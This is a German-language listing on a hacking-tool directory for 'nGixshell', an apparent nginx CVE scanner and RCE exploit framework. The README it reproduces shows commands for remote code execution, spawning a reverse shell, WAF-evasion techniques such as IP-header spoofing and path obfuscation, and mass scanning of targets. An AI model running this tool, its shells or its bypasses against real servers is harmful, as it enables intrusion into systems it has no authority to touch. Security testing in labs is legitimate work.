Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nGixshell — nginx CVE-Scanner + RCE-Exploit-Framework (CVE-2026-42945 + 16 weitere) | Kitploit
Tools/GitHubGitHub/mateusverass/ngixshell
AufklärungSchwachstellenscannerExploit-FrameworksWebanwendungs-ExploitationWAF-UmgehungWebsicherheitPenetrationstestsCommand and ControlSubdomain-EnumerationRed TeamingPayload-Entwicklung
21832vor 4 TagenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
mateusverass/ngixshell

nGixshell

nginx CVE-Scanner + RCE-Exploit-Framework (CVE-2026-42945 + 16 weitere)

Repository anzeigen
Teilen
nGixShell

Python CVEs Zero deps License


nGixShell ist ein nginx-CVE-Scanner und RCE-Exploit-Framework. Es liefert einen Proof-of-Concept für CVE-2026-42945 (CVSS 3.1 8.1 HIGH laut F5/NVD) — einen Heap-Buffer-Overflow im ngx_http_rewrite_module — sowie einen Scanner, der 64 nginx-CVEs mit automatisierten HTTP-Probes, Fingerprinting, WAF-Erkennung/-Umgehung, Web-Security-Auditing und Report-Generierung abdeckt.

Keine externen Abhängigkeiten. Reine Python-3-Stdlib.

Exploit-Voraussetzungen (zuerst lesen). --cmd / --shell funktionieren nur, wenn alle folgenden Bedingungen erfüllt sind: Das Ziel ist x86_64, die verwundbare rewrite+set-Konfiguration ist vorhanden, ASLR ist deaktiviert, und die Heap-/libc-Adressen wurden für genau diesen Build kalibriert (calibrate.py → --build-file). Siehe Exploit-Voraussetzungen. Der Scanner selbst hat keine solchen Voraussetzungen.


Schnellstart

# Spin up the vulnerable lab (builds nginx from source, ASLR disabled)
docker compose -f env/docker-compose.yml up -d --build

# Auto mode — fingerprint + CVE scan + web audit (works on any arch)
python3 ngixshell.py 127.0.0.1:19321

# RCE — calibrate, restart the worker for a clean heap, then exploit
W=$(pgrep -f 'nginx: worker' | head -1)
sudo python3 calibrate.py 127.0.0.1 19321 "$W" --spray-path /spray \
    --spray-mode full --json -o profile.json
docker compose -f env/docker-compose.yml restart nginx-vuln
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id > /tmp/rce.txt' \
    --build-file profile.json
docker compose -f env/docker-compose.yml exec nginx-vuln cat /tmp/rce.txt

# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell --build-file profile.json

# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Multiple targets from a file (one report per target)
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Keine Flags erforderlich — sobald das Tool auf ein Ziel gerichtet wird, läuft alles automatisch.
TLS wird automatisch erkannt. nginx wird selbst mit server_tokens off gefingerprintet.

system() erfasst stdout nicht: --cmd 'id' wird ausgeführt, gibt aber nichts zurück. Verwende einen Befehl mit beobachtbarer Nebenwirkung und bestätige ihn mit --verify-url http://target/pwned (HTTP 200 = bestätigt).


Verwendung

python3 ngixshell.py [TARGET] [OPTIONS]

TARGET formats:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

Modi

FlagBeschreibung
(keine)Auto — Fingerprint + CVE-Scan + Web-Audit
--cmd 'CMD'Befehl via CVE-2026-42945 RCE ausführen
--cmd-file FILEBefehle aus Datei ausführen (mit ; verbunden)
--shellReverse Shell starten
--shell-type TYPEPayload: bash python perl php nc powershell (Standard: python)
--upgrade-shellNach Shell-Verbindung automatisch PTY-Upgrade senden
--verify-url URLNach erkanntem Crash URL abrufen, um Befehlsausführung zu bestätigen (200 = verifiziert)
--subdomain-scan DOMAINVerwundbares nginx auf Subdomains finden
--cve CVE-IDEine bestimmte CVE testen
--list-cvesAlle 64 CVEs mit CVSS und Probe-Info ausgeben
--list-candidatesHeap-Adresskandidaten ausgeben
--dry-runNur Fingerprint + Scan, kein Exploit
--target-file FILEMehrere Hosts aus einer Datei scannen

Exploit-Tuning

FlagBeschreibung
--build-file FILEEmpfohlen. JSON-Kalibrierungsprofil aus calibrate.py --json -o FILE
--offsets SPECKommagetrennte Hex-Heap-Offsets aus calibrate.py (z. B. 0x5a427,0x60e67)
--heap-base HEX / --libc-base HEX / --system-addr HEXManuelle Adress-Overrides
--build KEYEingebautes Profil (nur die DepthFirst-Lab-Referenz wird mitgeliefert)
--rewrite-path PATHVerwundbare rewrite-Location (Standard /api)
--spray-path PATHproxy_pass-gestützte Location für den POST-Body-Spray (Standard /upload; das mitgelieferte Lab verwendet /spray)
--spray-mode partial|fullpartial: kurzer Body + große Content-Length (mitgeliefertes Lab); full: vollständiger Body + X-Delay (DepthFirst-Lab)
--pad-a N / --pad-plus NTrigger-Path-Padding vor dem +-Lauf (Standard 349 / 969, aus dem Vendor-PoC)
--continue-on-crashNach einem unbestätigten Crash weiter die verbleibenden Heap-Kandidaten versuchen
--tries N / --spray N / --body-len NTrigger-Versuche pro Kandidat / Spray-Verbindungen / Spray-Body-Größe

WAF-Erkennung & -Umgehung

FlagBeschreibung
--waf-detectWAF vor dem Scannen erkennen
--waf-bypassAlle Bypass-Techniken aktivieren (führt auch Erkennung aus)
--waf-ip IPDiese IP in Bypass-Headern spoofen (Standard: zufälliges RFC1918)

Bypass-Techniken (alle aktiv, wenn --waf-bypass gesetzt ist):

TechnikDetail
IP-SpoofingX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
UA-Rotation11 echte Browser-/Bot-User-Agents, pro Request randomisiert
Pfad-VerschleierungDoppel-Slash, /./-Padding, Prozent-Encoding, Groß-/Kleinschreibungsvariation
Header-Case-ShuffleRandomisiert die Groß-/Kleinschreibung von Header-Namen, um WAF-Pattern-Matching zu brechen

Erkannte WAFs: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

Web-Audit

Läuft im Scan-Modus automatisch. Alle Module können einzeln übersprungen werden.

FlagBeschreibung
--skip-headersHTTP-Security-Header-Audit überspringen
--skip-pathsPfad-/Datei-Discovery überspringen
--skip-vhostsVirtual-Host-Enumeration überspringen
--skip-tlsTLS-Protokoll-Audit überspringen
--path-wordlist FILEZusätzliche Pfade zum Testen (einer pro Zeile)
  • Header-Audit — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, version-leaking Header
  • Pfad-Discovery — 50+ Pfade; Sentinel-Probe eliminiert False Positives durch Catch-All-403/301-Regeln
  • Virtual-Host-Enumeration — erfordert Status- UND Body-Diff, um False Positives durch Default-Block zu vermeiden
  • TLS-Audit — testet TLS 1.0–1.3-Unterstützung, Zertifikatsablauf und Self-Signed-Erkennung
  • stub_status — parst Metriken aktiver Verbindungen aus /nginx_status, falls exponiert

Verbindung

FlagBeschreibung
--port PORTPort überschreiben
--tlsTLS erzwingen (standardmäßig automatisch erkannt)
--proxy URLProxy: http://, https://, socks5://

HTTP

FlagBeschreibung
--user-agent UABenutzerdefinierter User-Agent
--auth USER:PASSHTTP-Basic-Auth
--cookie VALUECookie-Header
--header NAME:VALUEZusätzlicher Header (wiederholbar)

Rate / Timing

Tool herunterladen